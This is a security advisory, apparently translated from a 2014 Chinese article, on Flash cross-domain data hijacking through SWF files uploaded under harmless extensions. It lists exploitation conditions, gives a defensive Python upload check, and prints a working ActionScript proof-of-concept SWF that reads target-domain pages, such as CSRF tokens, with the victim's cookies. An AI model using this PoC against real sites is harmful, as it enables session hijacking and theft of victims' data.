Flash cross-domain data hijacking vulnerability: a large wave of sites affected (vulnerability warning) - 黑吧安全网 (myhack58)

ID MYHACK58:62201447952
Type myhack58
Reporter Anonymous (佚名)
Modified 2014-05-28T00:00:00


0×01, Background

Many back-end upload handlers validate only the file extension and the Content-Type, and never inspect the contents of the file. On its own this sloppiness usually causes no great harm. In testing, however, the author found that when an object tag embeds a Flash file, Flash Player does not check the file's extension at all: as long as the content is a valid SWF, the object tag loads and executes it. ActionScript also provides several APIs for sending network requests (URLLoader, for example). So if an attacker can upload a SWF under any permitted extension to the target domain, they can host a carefully constructed malicious page on a domain they control, embed the uploaded file from there, and lure the victim to that page. Because a SWF's origin is the domain that serves it (the target), and not the page that embeds it, its requests go to the target domain with the victim's cookies and need no crossdomain.xml permission. The attacker can therefore hijack cross-domain data, read the CSRF token of the victim's current session, open any privileged page of the target domain as the victim, and perform privileged operations.

0×02, Exploitation conditions

All four of the following must hold:

1, The target site's upload logic does not verify the file content;
2, Uploaded files are not served from an isolated domain (they are reachable on the target domain itself);
3, The server does not force a Content-Disposition: attachment response header when serving uploaded files;
4, Access to uploaded files is not tied to a session (the victim's browser can fetch the attacker's file without the attacker's session).
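The server-side checks that close conditions 1 and 3 above, as an added Python example; this is not code from the original article or from any affected site. It recognises a SWF by its content (the FWS/CWS/ZWS signature Flash Player keys on), contrasts that with the extension-only logic the article describes, and shows the forced Content-Disposition: attachment header for serving stored uploads. The sample "uploads" are constructed inline (a JPEG header and two synthetic SWF headers), and the allowed-extension list is an assumed example policy.

```python
import struct
import zlib

# A SWF begins with a 3-byte signature (FWS = uncompressed, CWS = zlib-compressed,
# ZWS = LZMA-compressed), a version byte and a 4-byte little-endian total length.
SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")


def make_swf(signature: bytes, version: int, body: bytes) -> bytes:
    """Build a minimal SWF-shaped byte string (constructed test data, not a real movie)."""
    return signature + bytes([version]) + struct.pack("<I", 8 + len(body)) + body


# Constructed sample uploads: what each file *claims* to be versus what it contains.
SAMPLES = {
    "avatar.jpg": b"\xff\xd8\xff\xe0" + b"JFIF\x00" + b"\x00" * 16,      # genuine JPEG header
    "avatar.png": make_swf(b"FWS", 10, b"\x00" * 16),                    # SWF renamed to .png
    "readme.txt": make_swf(b"CWS", 10, zlib.compress(b"\x00" * 16)),     # compressed SWF as .txt
    "notes.txt": b"just some text",
}


def looks_like_swf(data: bytes) -> bool:
    """Flash Player decides by these bytes, not by the file name or Content-Type."""
    return len(data) >= 8 and data[:3] in SWF_SIGNATURES


def extension_allowed(filename: str, allowed=("jpg", "png", "gif", "txt")) -> bool:
    """Extension whitelist (assumed example policy)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in allowed


def accept_upload(filename: str, data: bytes, check_content: bool = True):
    """Return (accepted, reason). check_content=False reproduces the weak logic
    the article describes: extension-only validation that lets a renamed SWF through."""
    if not extension_allowed(filename):
        return False, "extension not allowed"
    if check_content and looks_like_swf(data):
        return False, "content is a SWF, regardless of extension"
    return True, "ok"


def upload_response_headers(filename: str) -> dict:
    """Headers to serve stored uploads with. Forcing Content-Disposition: attachment
    makes Flash Player refuse to run the file as an embedded movie (condition 3)."""
    safe_name = "".join(c for c in filename if c.isalnum() or c in "._-") or "download"
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": 'attachment; filename="%s"' % safe_name,
    }


def served_safely(headers: dict) -> bool:
    """Audit check: does a stored-upload response carry the forced attachment disposition?"""
    disposition = headers.get("Content-Disposition", "")
    return disposition.lower().startswith("attachment")


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, "weak:", accept_upload(name, data, check_content=False),
              "hardened:", accept_upload(name, data))
```

With check_content=False the renamed SWFs (avatar.png, readme.txt) are accepted exactly as the article's vulnerable back ends do; with the content check they are rejected before they ever land on the target domain. Serving whatever does get stored from a separate domain (condition 2) is the remaining defence and is a deployment decision rather than code.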

0×03, Attack scenario construction

First we need to construct a PoC SWF that sends an HTTP request. Since this is only a demo, it implements just a simple GET request whose target URL is passed in by the embedding page as the FlashVar "url"; the ActionScript 3 code is as follows:

import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.net.URLRequestMethod;   // needed for URLRequestMethod.GET; missing from the original listing
import flash.net.URLLoaderDataFormat;
import flash.net.URLVariables;
import flash.events.Event;
import flash.events.HTTPStatusEvent;
import flash.events.IOErrorEvent;
import flash.events.ProgressEvent;
import flash.events.SecurityErrorEvent;
import flash.display.LoaderInfo;
import flash.system.Security;

// Allow a page on any domain (i.e. the attacker's) to script this SWF.
Security.allowDomain("*");

// The URL to fetch on the target domain is supplied by the embedding page as the FlashVar "url".
var urlObj:Object = LoaderInfo(this.root.loaderInfo).parameters.url;
var request:URLRequest = new URLRequest(urlObj.toString());
request.method = URLRequestMethod.GET;

var loader:URLLoader = new URLLoader();

// "response" (a TextField) and "itemScroll" (a UIScrollBar) are assumed to be instances
// placed on the stage; they only display the fetched data inside the SWF.
itemScroll.x = response.x + response.width;
itemScroll.y = response.y;
itemScroll.height = response.height;

// The request goes out with the victim's cookies for the domain that hosts this SWF (the target).
loader.dataFormat = URLLoaderDataFormat.TEXT;
loader.addEventListener(Event.COMPLETE, loader_complete);
loader.load(request);

function loader_complete(e:Event):void {
    trace("Event.COMPLETE");
    trace("Resp Data :\n" + loader.data);
    response.text = loader.data;          // show the hijacked response, e.g. a page containing the CSRF token
    itemScroll.scrollTarget = response;
}
